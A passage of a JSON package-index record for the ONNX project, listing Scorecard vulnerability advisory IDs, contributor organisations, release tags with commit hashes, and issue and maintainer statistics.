GHSA-xrcv-f9gm-v42c","Warn: Project is vulnerable to: PYSEC-2021-137","Warn: Project is vulnerable to: PYSEC-2021-138","Warn: Project is vulnerable to: PYSEC-2021-317","Warn: Project is vulnerable to: PYSEC-2021-38","Warn: Project is vulnerable to: PYSEC-2021-39","Warn: Project is vulnerable to: PYSEC-2021-94","Warn: Project is vulnerable to: PYSEC-2023-175","Warn: Project is vulnerable to: PYSEC-2018-34 / GHSA-2fc2-6r4j-p65h","Warn: Project is vulnerable to: PYSEC-2021-856 / GHSA-5545-2q6w-2gh6","Warn: Project is vulnerable to: PYSEC-2019-108 / GHSA-9fq2-x9r6-wfmf","Warn: Project is vulnerable to: PYSEC-2018-33 / GHSA-cw6w-4rcx-xphc","Warn: Project is vulnerable to: PYSEC-2021-857 / GHSA-f7c7-j99h-c22f","Warn: Project is vulnerable to: GHSA-fpfv-jqm9-f5jm","Warn: Project is vulnerable to: PYSEC-2017-1 / GHSA-frgw-fgh6-9g52","Warn: Project is vulnerable to: PYSEC-2022-48 / GHSA-77rm-9x9h-xj3g","Warn: Project is vulnerable to: GHSA-8gq9-2x98-w8hf","Warn: Project is vulnerable to: GHSA-8qvm-5x2c-j2w7","Warn: Project is vulnerable to: PYSEC-2017-65 / GHSA-jwvw-v7c5-m82h","Warn: Project is vulnerable to: PYSEC-2013-22 / GHSA-27x4-j476-jp5f","Warn: Project is vulnerable to: PYSEC-2025-49 / GHSA-5rjg-fvgr-3xxf","Warn: Project is vulnerable to: GHSA-cx63-2mw6-8hw5","Warn: Project is vulnerable to: PYSEC-2022-43012 / GHSA-r9hx-vwmv-q579","Warn: Project is vulnerable to: PYSEC-2022-43017 / GHSA-qwmp-2cf2-g9g6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}},{"name":"CI-Tests","score":10,"reason":"30 out of 30 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 30 contributing companies or organizations","details":["Info: found contributions from: EasyRPG, PeachPy, ScottyLabs, ZhaobangChina, amd, anthropics, barnowl, chainer, couler-proj, cpprefjp, cryfs, cupy, dotnet, facebook, ghc, gsoc-cn, intelligent-machine-learning, k9mail, microsoft, microsoft research, mrbgems, nanyang technological university, nvidia, onnx, open-keychain, pytorch, sipb, skywork ai, sql-machine-learning, uc berkeley"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}}]},"last_synced_at":"2025-08-17T07:32:27.176Z","repository_id":24890799,"created_at":"2025-08-17T07:32:27.176Z","updated_at":"2025-08-17T07:32:27.176Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281322869,"owners_count":26481547,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-27T02:00:05.855Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"onnx","name":"Open Neural Network Exchange","uuid":"31675368","kind":"organization","description":"ONNX is an open ecosystem for interoperable AI models. It's a community project: we welcome your contributions!","email":null,"website":"https://onnx.ai","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/31675368?v=4","repositories_count":25,"last_synced_at":"2024-04-18T02:52:20.873Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/onnx","funding_links":[],"total_stars":37281,"followers":1377,"following":0,"created_at":"2022-11-02T16:24:54.756Z","updated_at":"2024-04-18T02:52:25.131Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx/repositories"},"tags":[{"name":"v1.19.1","sha":"b751946c3d59a3c8358abcc0569b59e6ddb08cdd","kind":"commit","published_at":"2025-10-08T03:53:00.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.19.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"57b9c6a4f6eebb09ae1b34cfb632078518f72832","kind":"commit","published_at":"2025-08-26T21:37:09.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.19.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.0/manifests"},{"name":"v1.18.0","sha":"e709452ef2bbc1d113faf678c24e6d3467696e83","kind":"commit","published_at":"2025-05-08T17:33:57.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.18.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.18.0/manifests"},{"name":"v1.17.0","sha":"b8baa8446686496da4cc8fda09f2b6fe65c2a02c","kind":"commit","published_at":"2024-09-30T22:42:05.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.17.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.17.0/manifests"},{"name":"v1.16.2","sha":"3bf92c03a9f27eba3bda1e5b9e63ea20ec213557","kind":"commit","published_at":"2024-07-31T13:15:06.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"595228d99e3977ac27cb79d5963adda262af99ad","kind":"commit","published_at":"2024-05-23T16:33:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"990217f043af7222348ca8f0301e17fa7b841781","kind":"commit","published_at":"2024-03-25T13:55:50.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.0/manifests"},{"name":"v1.15.0","sha":"b86cc54efce19530fb953e4b21f57e6b3888534c","kind":"commit","published_at":"2023-10-25T22:10:41.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.15.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.15.0/manifests"},{"name":"v1.14.1","sha":"1014f41f17ecc778d63e760a994579d96ba471ff","kind":"commit","published_at":"2023-08-24T22:20:34.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.14.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"a0d77f18516d2da7468a96b0de3b737266f23176","kind":"commit","published_at":"2023-05-04T00:14:24.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.14.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.0/manifests"},{"name":"v1.13.1","sha":"ad834eb73ee0cd9b6fa9ea892caeed5fa17d7dc0","kind":"commit","published_at":"2023-02-21T22:21:30.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.13.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"1ba785612a79fe749aa1e478336e534743372639","kind":"commit","published_at":"2022-12-09T18:56:29.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.13.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.0/manifests"},{"name":"v1.12.0","sha":"f7ee1ac60d06abe8e26c9b6bbe1e3db5286b614b","kind":"commit","published_at":"2022-06-17T23:32:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.12.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"96046b8ccfb8e6fa82f6b2b34b3d56add2e8849c","kind":"commit","published_at":"2022-02-16T23:56:21.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.11.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.11.0/manifests"},{"name":"v1.10.2","sha":"da889e6b95750350726d149bf447bf0cd1245964","kind":"commit","published_at":"2021-10-25T15:52:09.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1f63dcb7fcc3a8bf5c3c8e326867ecd6f5c43f35","kind":"commit","published_at":"2021-08-02T16:53:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"7c1e0b0391d06002789e56f8fe0c7bb9f4d1159b","kind":"commit","published_at":"2021-07-30T20:26:55.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.0/manifests"},{"name":"v1.9.0","sha":"1089b9e8045a3a2882d7bb6a1dbaeaf9cae131da","kind":"commit","published_at":"2021-04-19T09:51:42.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.9.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.9.0/manifests"},{"name":"v1.8.1","sha":"685898bc6f3fd6eb16ba129ea990f96330537e38","kind":"commit","published_at":"2021-01-29T23:23:52.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.8.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"994c6181247d7b419b28889fc57d5817e2089419","kind":"commit","published_at":"2020-11-06T05:01:27.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.8.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.0/manifests"},{"name":"v1.7.0","sha":"0c070abb0c40fec649f81a73a75b0098662ec486","kind":"commit","published_at":"2020-05-08T21:09:31.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.7.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"553df22c67bee5f0fe6599cff60f1afc6748c635","kind":"commit","published_at":"2019-09-25T20:35:26.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.6.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.6.0/manifests"},{"name":"v1.5.0","sha":"94d238d96e3fb3a7ba34f03c284b9ad3516163be","kind":"commit","published_at":"2019-04-24T05:05:06.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.5.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.5.0/manifests"},{"name":"v1.4.1","sha":"9e55ace55aad1ada27516038dfbdc66a8a0763db","kind":"commit","published_at":"2019-01-23T23:05:32.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.4.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"8a1319733a5518bd0001842db27e2df53a306eff","kind":"commit","published_at":"2019-01-23T01:49:13.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.4.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.0/manifests"},{"name":"v1.2.3","sha":"5af210ca8a1c73aa6bae8754c9346ec54d0a756e","kind":"commit","published_at":"2018-09-07T22:57:18.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.3","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.3/manifests"},{"name":"v1.3.0","sha":"bae6333e149a59a3faa9c4d9c44974373dcf5256","kind":"commit","published_at":"2018-08-30T17:33:20.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.3.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.3.0/manifests"},{"name":"v1.2.2","sha":"3376d4438aaadfba483399fa249b841153152bc0","kind":"commit","published_at":"2018-06-18T18:43:47.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"c7b60050ad6ae963bf2cc1d0eb3c32b07eb7eeed","kind":"commit","published_at":"2018-05-25T02:03:59.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.1/manifests"},{"name":"v1.1.2","sha":"2f85783fc43576b5e39b207f95d5f789641ae706","kind":"commit","published_at":"2018-04-25T23:02:26.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.1.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.2/manifests"},{"name":"v1.1.0","sha":"79dc46fa4d484981f75695a73f3d38d5717fc435","kind":"commit","published_at":"2018-03-10T06:34:57.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.1.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.0/manifests"},{"name":"v1.0.1","sha":"7633012b06b4caf0f829060668d06948c7f42e03","kind":"commit","published_at":"2018-01-26T02:25:37.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.0.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0.1/manifests"},{"name":"v1.0","sha":"5712a94fa8bd9cb4c99f2a5c05156576739f76f4","kind":"commit","published_at":"2017-12-04T21:39:16.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0/manifests"},{"name":"v0.2","sha":"63569b8a2e2ad4f56c5476954337a87cc4428862","kind":"commit","published_at":"2017-10-10T04:52:28.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v0.2","html_url":"https://github.com/onnx/onnx/releases/tag/v0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.2/manifests"},{"name":"v0.1","sha":"bbe22f447a4f3c38642dc9ca7ba0e8dd1ebaef94","kind":"commit","published_at":"2017-09-07T07:56:59.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v0.1","html_url":"https://github.com/onnx/onnx/releases/tag/v0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.1/manifests"}]},"repo_metadata_updated_at":"2025-10-27T18:39:38.008Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":null,"forks_count":null,"average":8.172500131868823},"purl":"pkg:golang/github.com/onnx/onnx","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/onnx/onnx","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/onnx/onnx","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/onnx/onnx/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-25T16:00:29.826Z","issues_count":1002,"pull_requests_count":2088,"avg_time_to_close_issue":24651025.396024466,"avg_time_to_close_pull_request":3750894.192264574,"issues_closed_count":653,"pull_requests_closed_count":1784,"pull_request_authors_count":174,"issue_authors_count":605,"avg_comments_per_issue":2.6766467065868262,"avg_comments_per_pull_request":1.985632183908046,"merged_pull_requests_count":1448,"bot_issues_count":5,"bot_pull_requests_count":386,"past_year_issues_count":201,"past_year_pull_requests_count":1024,"past_year_avg_time_to_close_issue":1563078.0,"past_year_avg_time_to_close_pull_request":426840.47297297296,"past_year_issues_closed_count":79,"past_year_pull_requests_closed_count":814,"past_year_pull_request_authors_count":69,"past_year_issue_authors_count":120,"past_year_avg_comments_per_issue":1.5621890547263682,"past_year_avg_comments_per_pull_request":1.6904296875,"past_year_bot_issues_count":5,"past_year_bot_pull_requests_count":186,"past_year_merged_pull_requests_count":706,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/issues","maintainers":[{"login":"andife","count":435,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andife"},{"login":"justinchuby","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/justinchuby"},{"login":"jcwchen","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jcwchen"},{"login":"liqunfu","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/liqunfu"},{"login":"daquexian","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/daquexian"},{"login":"take-cheeze","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"},{"login":"zhenhuaw-me","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zhenhuaw-me"},{"login":"prasanthpul","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/prasanthpul"},{"login":"jbachurski","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbachurski"},{"login":"houseroad","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/houseroad"},{"login":"lutzroeder","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lutzroeder"},{"login":"linkerzhang","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/linkerzhang"},{"login":"xuzijian629","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xuzijian629"},{"login":"philass","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philass"}],"active_maintainers":[{"login":"andife","count":332,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/